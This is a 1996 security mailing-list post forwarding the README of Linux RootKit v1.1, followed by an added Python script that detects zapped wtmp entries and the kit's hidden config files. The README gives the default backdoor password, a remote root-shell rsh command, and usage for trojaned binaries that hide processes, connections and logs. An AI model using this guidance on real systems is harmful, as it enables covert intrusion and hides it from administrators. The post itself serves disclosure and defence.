Date: Mon, 16 Sep 1996 20:16:34 +0300 (EET DST)
From: Seppo Kallio <kallio@beeblebrox.cc.jyu.fi>
To: freebsd-security@freebsd.org
Subject: Is Linux RootKit a know packet ?
Message-ID: <Pine.BSF.3.91.960916200814.22617A-100000@beeblebrox.cc.jyu.fi>
We had some cracker using Linux RootKit. I hope the security people working with NetBSD/OpenBSD and FreeBSD know this. And this time, I hope nobody will ever port it to BSD ;-)

Seppo kallio@jyu.fi

---

Cybernetik proudly presents...

    [ASCII-art banner: Linux RootKit]

    V1.1                Released 20/04/96

    "It worked perfectly on *MY* system ;)"

UPDATES

1.1     Fixed login bug (didn't set HISTFILE properly. duh!)
        Fixed BIG inetd bug. Alright so I forgot to try it with the service
        enabled. Sorry, I found this out the hard way too. (Not that anybody
        has complained yet :)
        Included linsniffer, a more practical sniffer.
        Included wted and lled, two programs I wrote a while ago... the
        main difference between these and zap is that these actually REMOVE
        entries leaving no traces.
        Included bindshell.c coded by Pluvius.
        Added SHOWFLAG to netstat.

This package includes the following:

chfn            Trojaned! User->r00t
chsh            Trojaned! User->r00t
inetd           Trojaned! Remote access
login           Trojaned! Remote access
ls              Trojaned! Hide files
du              Trojaned! Hide files
ifconfig        Trojaned! Hide sniffing
netstat         Trojaned! Hide connections
passwd          Trojaned! User->r00t
ps              Trojaned! Hide processes
top             Trojaned! Hide processes
rshd            Trojaned! Remote access
syslogd         Trojaned! Hide logs
linsniffer      A kewl sniffz0r!
sniffit         Another kewl sniffer!
fix             File fixer!
z2              Zap2 utmp/wtmp/lastlog eraser!
wted            wtmp/utmp editor!
lled            lastlog editor!
bindshell       port/shell type daemon!

INSTALLATION

To install this kit execute the command 'make all install' from ya # prompt.

All of the files/password configuration is in rootkit.h so feel free to personalise your own version of lrk2 :-) It probably won't compile everything on older systems but that's life. Everything here has been tested on a slackware 3.0 distribution, on other systems there were minor errors but these could be fixed by adding the odd #include or removing the offending code.

USAGE

OK I will go thru how to use each program one by one. NOTE when I say password I mean the rootkit password not your users password (doh!). By default the rootkit password is lrkr0x.

chfn -          Local user->root. Run chfn then when it asks you for a new name
                enter your password.
chsh -          Local user->root. Run chsh when it asks you for a new shell
                enter your password.
inetd -         Binds a shell to a port for remote access. hehe look at the
                source if u want this one =)
login -         Allows login to any account with the rootkit password.
                If root login is refused on your terminal login as "rewt".
                History logging is disabled if you login using your password.
ls -            Trojaned to hide specified files and dirs.
                Default data file is /dev/ptyr.
                All files can be listed with 'ls -/'.
                The format of /dev/ptyr is:
                ptyr
                hack.dir
                w4r3z
                ie. just the filenames. This would hide any files/dirs with the
                names ptyr, hack.dir and w4r3z.
du -            Same as ls, 'cept for du instead :)
ifconfig -      Modified to remove PROMISC flag when sniffing.
netstat -       Modified to remove tcp/udp/sockets from or to specified
                addresses, uids and ports.
                default data file: /dev/ptyq
                command 0: hide uid
                command 1: hide local address
                command 2: hide remote address
                command 3: hide local port
                command 4: hide remote port
                command 5: hide UNIX socket path
                example:
                0 500            <- Hides all connections by uid 500
                1 128.31         <- Hides all local connections from 128.31.X.X
                2 128.31.39.20   <- Hides all remote connections to 128.31.39.20
                3 8000           <- Hides all local connections from port 8000
                4 6667           <- Hides all remote connections to port 6667
                5 .term/socket   <- Hides all UNIX sockets including the path
                                    .term/socket

                Yeah eyem lazy. This is ira's description. Why bother thinking
                up werds when someones already done it?
passwd -        Local user->root. Enter your rootkit password instead of your
                old password.
ps -            Modified to remove specified processes.
                Default data file is /dev/ptyp.
                An example data file is as follows:
                0 0              Strips all processes running under root
                1 p0             Strips tty p0
                2 sniffer        Strips all programs with the name sniffer
                Don't put in the comments, obviously.
top -           Identical to ps, 'cept for top instead.
rshd -          Execute remote commands as root.
                Usage: rsh -l rootkitpassword host command
                ie. rsh -l lrkr0x cert.org /bin/sh -i
                would start a root shell.
syslogd -       Modified to remove specified strings from logging.
                I thought of this one when I was on a system which logged
                every connection.. I kept getting pissed off with editing
                files every time I connected to remove my hostname. Then I
                thought 'Hey dude, why not trojan syslogd?!' and the rest
                is history. :)
                Default data file is /dev/ptys
                Example data file:
                evil.com
                123.100.101.202
                rshd
                This would remove all logs containing the strings evil.com,
                123.100.101.202 and rshd. Smart! :))
sniffit -       An advanced network sniffer. This is pretty kewl and has lots
                of filtering options and other stuff. Useful for targeting a
                single host or net. Sniffit uses ncurses.
linsniffer -    A kewl sniffer. This is smaller than sniffit and doesn't need
                the ncurses libraries.

                As CERT say, sniffing is responsible for more mass network
                breakins than anything else in the 90's. P'raps they ain't
                heard of Sendmail before hahahaha

fix -           Replaces and fixes timestamp/checksum information on files.
                I modified this a bit for my own uses and to fix a nasty bug
                when replacing syslogd and inetd. The replacement file will
                be erased by fix (unlike other versions).

z2 -            Zapper2! Run this to erase the last utmp/wtmp/lastlog entries
                for a username. This can be detected since it just nulls the
                entry out but no sysadmins know this, right?
wted -          This does lots of stuff. U can view ALL the entries in a wtmp
                or utmp type file, erase entries by username or hostname,
                view zapped users (admins use a util similar to this to find
                erased entries), erase zapped users etc.
lled -          Basically the same as wted but for lastlog entries.

SOURCES

Some of these patches are derived from the original SunOS rootkit, the ps and top patches came from the first linux rootkit by ira. All of the others were patched by moi. I patched just about everything I could think of. njoi ;-)

OTHER STUFF

If u wanna send me some email direct it towards na470561@anon.penet.fi. I welcome all unreleased exploits, passwd files and offers of cash/women :) If its important then ENCRYPT IT!

My pgp key is:

Check out these kewl sites:     ftp://ftp
                                http://ww
                                http://ww
                                http://ww
                                http://un

Lastly, don't rely on just this kit to keep yourself hidden. Learn unix, learn C, learn how to hack properly rather than just being a kr4d 3l33t sKr1ptZ h4q3R. This kit won't save you from good logging or active network monitoring. If you don't understand what this kit does then read the source code. In short - use yer brain.

Seppo Kallio                            kallio@jyu.fi
Computing Center                        Fax +358-14-603611
U of Jyväskylä          62.14N 25.44E   Phone +358-14-603606
PL 35, 40351 Jyväskylä, Finland         http://www.jyu.fi/~kallio
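The README concedes two weak points a sysadmin can check for: z2 only nulls a utmp/wtmp entry out, and every trojan reads its hide-list from a regular file parked under a /dev/pty* name (/dev/ptyr, /dev/ptyq, /dev/ptyp, /dev/ptys). The script below is an added example, not code from the message or from the kit; it assumes the Linux glibc utmp record layout (384 bytes), walks a wtmp image listing surviving logins and all-NUL slots, and reports any of those four names that exist as a regular file instead of a character device. The wtmp sample it runs on is constructed inline.

```python
import os, stat, struct

# Linux glibc struct utmp (assumed layout, 384 bytes): ut_type, pad, ut_pid, ut_line[32],
# ut_id[4], ut_user[32], ut_host[256], exit status, ut_session, ut_tv, ut_addr_v6, unused.
UTMP_FMT = "<hxxi32s4s32s256shhiii16s20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384
# Default data files named in the lrk README; genuine pty slots are character devices.
LRK_DATA_FILES = ("/dev/ptyr", "/dev/ptyq", "/dev/ptyp", "/dev/ptys")

def cstr(raw):  # decode a NUL-padded fixed-width field
    return raw.split(b"\x00", 1)[0].decode("latin-1")

def scan_wtmp(data):
    # z2 nulls an entry in place, so its trace is an all-NUL record between real logins.
    if len(data) % UTMP_SIZE:
        raise ValueError("wtmp length is not a multiple of %d" % UTMP_SIZE)
    records, zapped = [], []
    for idx in range(len(data) // UTMP_SIZE):
        chunk = data[idx * UTMP_SIZE:(idx + 1) * UTMP_SIZE]
        if chunk == b"\x00" * UTMP_SIZE:
            zapped.append(idx)
            continue
        f = struct.unpack(UTMP_FMT, chunk)
        records.append({"type": f[0], "pid": f[1], "line": cstr(f[2]),
                        "user": cstr(f[4]), "host": cstr(f[5]), "time": f[9]})
    return records, zapped

def make_record(ut_type, pid, line, user, host, tv_sec):
    # Build one utmp record; used here only to construct sample data.
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"",
                       user.encode(), host.encode(), 0, 0, 0, tv_sec, 0, b"")

def suspicious_dev_entry(st_mode):
    # A /dev/pty* name that is a regular file instead of a char device is the kit's config.
    return stat.S_ISREG(st_mode)

def check_lrk_data_files(paths=LRK_DATA_FILES):
    hits = []  # kit data files present as regular files on this host
    for p in paths:
        try:
            if suspicious_dev_entry(os.lstat(p).st_mode):
                hits.append(p)
        except FileNotFoundError:
            pass
    return hits

if __name__ == "__main__":
    # Constructed sample: a login, a zapped slot, then the matching logout.
    sample = (make_record(7, 100, "tty1", "root", "", 842900000)
              + b"\x00" * UTMP_SIZE + make_record(8, 100, "tty1", "", "", 842903600))
    recs, zapped = scan_wtmp(sample)
    print("logins:", [(r["user"], r["line"], r["time"]) for r in recs],
          "| zapped slots:", zapped, "| kit data files:", check_lrk_data_files())
```

Run it against a copy of /var/log/wtmp taken with a known-good copy of cp, since the kit's own ls and du hide files but do not change the record layout on disk.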